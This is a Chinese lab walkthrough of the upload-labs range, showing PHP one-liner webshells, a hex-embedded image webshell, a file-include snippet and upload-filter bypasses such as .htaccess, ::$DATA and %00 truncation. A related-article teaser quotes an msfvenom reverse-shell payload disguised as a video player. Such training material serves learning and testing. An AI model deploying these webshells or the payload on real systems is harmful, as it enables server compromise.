Upload靶场通关笔记

文章目录

  • 一、Pass-01
    • 1.抓包上传
    • 2.获取上传路径
    • 3.工具验证
  • 二、Pass-02
  • 三、Pass-03
  • 1.使用httpd.conf自定义后缀
  • 2.提取上传文件名
  • 3.工具测试
  • 4.注意点
  • 四、Pass-04
    • 1.上传.htaccess
    • 2.上传图片
    • 3.工具测试
  • 五、Pass-05
  • 六、Pass-06
    • 1.空格+.号绕过
    • 2.工具测试
  • 七、Pass-07
  • 八、Pass-08
    • 1.特殊符号绕法
    • 2.工具测试
  • 九、Pass-09
    • 1.特殊符号+.+空格组合绕过
    • 2.工具测试
  • 十、Pass-10
    • 1.双写绕过
    • 2.工具测试
  • 十一、Pass-11
  • 十二、Pass-12
    • 1.00截断条件1
    • 2.00截断条件2
    • 3.空格a替换
    • 4.工具测试
  • 十三、Pass-13
    • 1.制作图片马
    • 2.工具测试
  • 十四、Pass-14
  • 十五、Pass-16
    • 1.制作图片马
    • 2.对比修改
    • 3.替换未修改
    • 4.上传测试
  • 十六、Pass-17
  • 十七、Pass-18
  • 十八、Pass-19
  • 十九、Pass-20

在这里插入图片描述

一、Pass-01

在这里插入图片描述在这里插入图片描述

1.抓包上传

只能上传jpg,png,gif格式图片,因此先选一个jpg,然后抓包修改文件类型和文件数据

在这里插入图片描述在这里插入图片描述在这里插入图片描述

2.获取上传路径

接下来需要知道文件上传到哪个目录下
在这里插入图片描述

可以看出上传到上一级目录的upload文件夹了,而当前目录是
http://127.0.0.1/upload/Pass-01/index.php,即http://127.0.0.1/upload/Pass-01/
因此上一级目录是http://127.0.0.1/upload/
即最终上传路径是http://127.0.0.1/upload/upload/
可以看出已上传成功,接下来用工具连接验证下

3.工具验证

在这里插入图片描述

F12解析成功
在这里插入图片描述

说明连接和调用成功

二、Pass-02

还是用上一题的办法

<?php @eval($_POST["fname"]);?>

Content-Type: image/jpeg
Content-Type:application/octet-stream
在这里插入图片描述
在这里插入图片描述

三、Pass-03

不出所料不能用老办法了
在这里插入图片描述

1.使用httpd.conf自定义后缀

那就改后缀绕过,改成3.phtml
在这里插入图片描述
在这里插入图片描述

2.提取上传文件名

在这里插入图片描述

发现可以上传,但是文件名被改了,没关系可以提取,202306261154331548.phtml
验证下看能不能解析,发现不行
在这里插入图片描述

3.工具测试

猜测应该是我的皮卡丘版本较老,换装新版本试下
在这里插入图片描述在这里插入图片描述

菜刀也连接成功了
在这里插入图片描述

4.注意点

值得说明的是一句话代码那里第一个空行不要删,不然上传不会成功的
在这里插入图片描述

四、Pass-04

在这里插入图片描述

显然phtml也被禁了,不信你可以试下
在这里插入图片描述

1.上传.htaccess

尝试使用.htaccess文件,先上传它
在这里插入图片描述

2.上传图片

然后上传图片,只要加一句话木马就行,其他不用改
在这里插入图片描述

3.工具测试

测试下
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

五、Pass-05

在这里插入图片描述

好吧,这关.htaccess也不能用了
大小写绕过
但是Php是不是可以呢
在这里插入图片描述

上传成功,试下能不能运行
在这里插入图片描述在这里插入图片描述

OK 搞定

六、Pass-06

在这里插入图片描述

1.空格+.号绕过

试了下大小写绕过失败,.htaccess上传失败
最后用这种奇怪的方法组合绕过了,即空格+.号绕过
在这里插入图片描述

2.工具测试

在这里插入图片描述在这里插入图片描述

七、Pass-07

在这里插入图片描述

同上题绕法
这个狠,试下上题的方法先
在这里插入图片描述

这次也上传成功了
在这里插入图片描述

工具测试
在这里插入图片描述在这里插入图片描述

OK 搞定

八、Pass-08

在这里插入图片描述在这里插入图片描述

这次不行了

1.特殊符号绕法

试下特殊符号绕法:1.php::$DATA
在这里插入图片描述

果然可以

2.工具测试

在这里插入图片描述在这里插入图片描述

OK 搞定

九、Pass-09

在这里插入图片描述

1.特殊符号+.+空格组合绕过

在这里插入图片描述

2.工具测试

在这里插入图片描述

看来这个也没问题了

十、Pass-10

在这里插入图片描述在这里插入图片描述

1.双写绕过

发现会把php去掉,那就来个双写绕过
在这里插入图片描述

很好,上传成功
在这里插入图片描述

2.工具测试

在这里插入图片描述在这里插入图片描述

OK 搞定

十一、Pass-11

在这里插入图片描述

经尝试,双写绕过失败,特殊符号绕过失败
在这里插入图片描述

00截断绕过
11.php%00.jpg,11.jpg%00.php
这里我们使用00截断绕过,此外还需修改content-Type这个值,因为这样jpg也可以解析了
如下图所示,save_path在上面,说明是get型00截断
在这里插入图片描述

在filename=XX.php%00.jpg
在这里插入图片描述
在这里插入图片描述

十二、Pass-12

在这里插入图片描述

save_path在下面,说明是post型00截断
post型的需要在upload后面追加 XX.php ,php后面有空格
在这里插入图片描述

然后切换到16进制页面,找到空格的位置
在这里插入图片描述

将20改成00
在这里插入图片描述

然后放包
但是失败了
在这里插入图片描述

经查:在php 5.3.4中php修复了0字符,但是在之前的版本中00在php中危害较大
在这里插入图片描述

1.00截断条件1

而我的PHP是5.4.45因此尝试下降级
在这里插入图片描述

2.00截断条件2

其次php.ini中的magic_quotes_gpc是必须off状态的
在这里插入图片描述

3.空格a替换

然后我们在12.php后面加:空格a,a是方便定位,空格16进制换成00后就可以上传php文件了
在这里插入图片描述
在这里插入图片描述

4.工具测试

在这里插入图片描述

十三、Pass-13

在这里插入图片描述

这节应该需要做内容绕过
文件内容绕过:
JPG:JPGGraphicFile;gif:GIF89A,zip:ZipCompressed
doc .xls .xlt .ppt .apr:MSCompoundDocumentv1orLotusApproachAPRfile

1.制作图片马

首先使用dos命令制作图片马
在这里插入图片描述
在这里插入图片描述

然后直接上传2.jpg
在这里插入图片描述

准备本地包含测试代码include.php

<?php
$file = $_GET['file'];
include $file;
?>

2.工具测试

在这里插入图片描述
在这里插入图片描述

十四、Pass-14

在这里插入图片描述

同上题
在这里插入图片描述

15关程序有问题,跳过

十五、Pass-16

在这里插入图片描述

1.制作图片马

首先制作图片马,这次使用gif
在这里插入图片描述

然后上传图片,但是发现上传后的图片被重新编码了,一句话代码找不到了
在这里插入图片描述

2.对比修改

使用EmEditor工具对比看下哪些地方没改
在这里插入图片描述

可以看出上图箭头处这块没动,因此可以将一句话木马替换进去,把左图下面这段复制出来
在这里插入图片描述

3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 50 4F 53 54 5B 22 66 6E 61 6D 65 22 5D 29 3B 3F 3E 1A 替换到1.gif这个位置,同时记住这里选了多少个字符,这里是96个
替换到箭头处开始的96个字符之后变成

3.替换未修改

变成
在这里插入图片描述

4.上传测试

然后将1.gif保存上传
在这里插入图片描述

上传成功了
说明没有被过滤掉
在这里插入图片描述

工具测试
在这里插入图片描述
在这里插入图片描述

十六、Pass-17

同上题做法

十七、Pass-18

被保存到上一级目录了,不过没关系还是可以跑
在这里插入图片描述
在这里插入图片描述

十八、Pass-19

同16关做法

十九、Pass-20

同16关做法

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/33177.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

NoSQL之Redis优化(一)

Redis的高可用 一、Redis 持久化RDB 持久化AOF 持久化RDB和AOF的优缺点 二、Redis 性能管理内存碎片如何产生的&#xff1f;解决碎片率大的问题&#xff1a;内存使用率内回收key 在web服务器中&#xff0c;高可用是指服务器可以正常访问的时间&#xff0c;衡量的标准是在多长时…

8.6 socket套接字及TCP的实现框架

socket套接字 目录 socket套接字 体系结构的两种形式 几种常见的网络编程接口 socket套接字 socket常用API介绍 socket套接字 三元组【IP地址&#xff0c;端口&#xff0c;协议】 地址族结构体 套接字类型 TCP通信的实现过程 体系结构的两种形式 网络的体系结构 (N…

TinyViT: 一种高效的蒸馏方法

目录 背景方法大意快速预训练蒸馏(Fast Pretraining Distillation, FPD)如何实现快速三个细节深入理解FPD 模型架构训练trick预训练参数配置&#xff08;Imagenet21k-pretraining&#xff09;finetuning 参数配置&#xff08;Imagenet-1k&#xff09; 消融实验**Q: 数据是否越多…

window10 sourceTree 更新系统后打不开解决办法

C:\Users\你的用户名\AppData\Local\Atlassian\SourceTree.exe_Url_j5xkjtpcegcqqaaahn4rsx42sj42zy5a\版本号这个目录下 删除文件Composition.cache &#xff08;在启动即可&#xff09; 打开sourcetree后成功生成了我们删除的 Composition.cache 文件。

论文浅尝 | SimKGC:基于预训练语言模型的简单对比知识图谱补全

笔记整理&#xff1a;李雅新&#xff0c;天津大学硕士&#xff0c;研究方向为知识图谱补全 链接&#xff1a;https://dl.acm.org/doi/10.1145/3539597.3570483 动机 知识图谱补全 (KGC) 旨在对已知事实进行推理并推断缺失的链接。基于文本的方法从自然语言描述中学习实体表示&a…

使用msfvenom获取windows shell

Windows 1. kali 使用 msfvenom 生成程序文件 使用一个编码器msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.133.66 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音1.exe其中,-a 指…

基于Alexnet网络实现猫狗数据集分类(Keras框架)

目录 1、作者介绍2、Alexnet网络2.1 网络介绍2.2 AlexNet网络的主要特点 3、基于Alexnet网络实现猫狗数据集分类3.1 猫狗大战数据集3.2 数据集处理3.3 准备工作3.4 训练过程3.5 对比实验3.5.1 HALCON平台下的Alexnet对比实验3.5.2 HALCON平台下的Resnet-50对比实验3.5.3 HALCON…

解决win10开机卡顿、配置很高但是玩游戏卡顿掉帧等问题

解决win10开机卡顿、配置很高但是玩游戏卡顿掉帧等问题 最近组装了一台高配置的新电脑&#xff0c;装好了各种驱动、软件等。发现系统开机后卡顿一分钟左右&#xff08;加载应用配置等&#xff09;&#xff0c;但是我的系统启动项明明就没多少&#xff0c;不应该是这样的情况&…

人工智能(AI)在金融行业的应用

人工智能&#xff08;AI&#xff09;技术在金融行业的应用日益广泛&#xff0c;为金融机构提供了更高效、更智能的解决方案。以下和大家分享AI在金融行业的一些主要应用&#xff0c;希望对大家有所帮助。北京木奇移动技术有限公司&#xff0c;专业的软件外包开发公司&#xff0…

Android 13(T) - binder阅读(5)- 使用ServiceManager注册服务2

上一篇笔记我们看到了binder_transaction&#xff0c;这个方法很长&#xff0c;这一篇我们将把这个方法拆分开来看binder_transaction做了什么&#xff0c;从而学习binder是如何跨进程通信的。 1 binder_transaction static void binder_transaction(struct binder_proc *proc…

Docker-DockerFile制定镜像

本文已收录于专栏 《中间件合集》 目录 概念说明DockerDockerFile 提供服务指令解析应用实例常用命令总结提升 概念说明 Docker &emspDocker是一种开源的容器化平台&#xff0c;它可以将应用程序及其依赖项打包到一个独立的、可移植的容器中&#xff0c;以实现快速部署和跨…

【0212】tcpdump抓包分析pg_hba.conf以password作为认证证方式下frontend与Backend之间身份验证过程(13 - 2)

文章目录 1. 回顾2. 密码校验通过3. 密码校验失败上一文:【0211】tcpdump抓包分析pg_hba.conf以password作为认证证方式下frontend与Backend之间身份验证过程(13 - 1) 1. 回顾 在上一节内容中,讲解了Backend对于接收到来自frontend的字符串明文密码,和来自于来自pg_auth…

【网络原理】TCP/IP协议五层模型

&#x1f94a;作者&#xff1a;一只爱打拳的程序猿&#xff0c;Java领域新星创作者&#xff0c;CSDN、阿里云社区优质创作者。 &#x1f93c;专栏收录于&#xff1a;计算机网络原理 本期讲解协议、OSI七层模型、TCP/IP五层模型、网络设备所在的分层、数据的封装和分佣。 目录 …

STM32速成笔记—RTC

文章目录 一、RTC简介二、STM32的RTC2.1 主要特性2.2 RTC框图介绍 三、访问后备区域步骤四、RTC配置步骤五、RTC程序配置5.1 RTC结构体定义5.2 RTC初始化函数5.3 设置年月日&#xff0c;时分秒5.4 判断闰年函数5.5 获取当前年月日&#xff0c;时分秒5.6 获取星期几5.7 中断服务…

ModaHub魔搭社区:安装、启动 Milvus 服务(GPU版)教程

目录 安装、启动 Milvus 服务 安装前提 操作系统 硬件 软件 确认 Docker 状态 拉取 Milvus 镜像 下载并修改配置文件 启动 Milvus Docker 容器 常见问题 接下来你可以 安装、启动 Milvus 服务 CPU 版 Milvus GPU 版 Milvus 安装前提 操作系统 操作系统 版本 Ce…

Windows下安装ClickHouse图文教程

文章目录 1.安装WSL21.1启用适用于 Linux 的 Windows 子系统1.2启用Windows虚拟机功能1.3将WSL2设置为默认版本1.4下载Linux内核更新包1.5安装Linux子系统1.6设置账户和密码 2.安装Docker2.1下载与安装2.2设置镜像地址 3.安装Clickhouse3.1拉取镜像3.2启动clickhouse-server3.3…

git常用命令之命令集

15. 命令集 场景1. 构造1个文件的10个commit 命令作用for i in {1..10}; do date >> 66.txt && git add . && git commit -sm "update"; done自证 场景2. 构造10个文件 命令作用for i in {1..10}; do date >> "file_$i.log&quo…

vue3+vite安装配置element-plus

配置 element-plus 1. 安装 yarn add element-plus element-plus/icons-vue2. 按需引入插件 yarn add unplugin-vue-components unplugin-auto-import -D3. 配置vite.config.ts // vite.config.ts import AutoImport from unplugin-auto-import/vite import Components fro…

logback日志的分片压缩

logback-spring.xml <?xml version"1.0" encoding"UTF-8"?> <configuration debug"true"><springProperty name"LOG_PATH" source"shands.log.logPath" defaultValue"/var/delonix/logs/local"…

Python 基本数据类型(一)

文章目录 每日一句正能量Python3 基本数据类型多个变量赋值标准数据类型结语 每日一句正能量 最宝贵的生命&#xff0c;是我的灵魂所在&#xff0c;也是我&#xff0c;赖以生存的&#xff0c;最基本的保障。有了生命&#xff0c;也就有了&#xff0c;我的光明&#xff0c;我的神…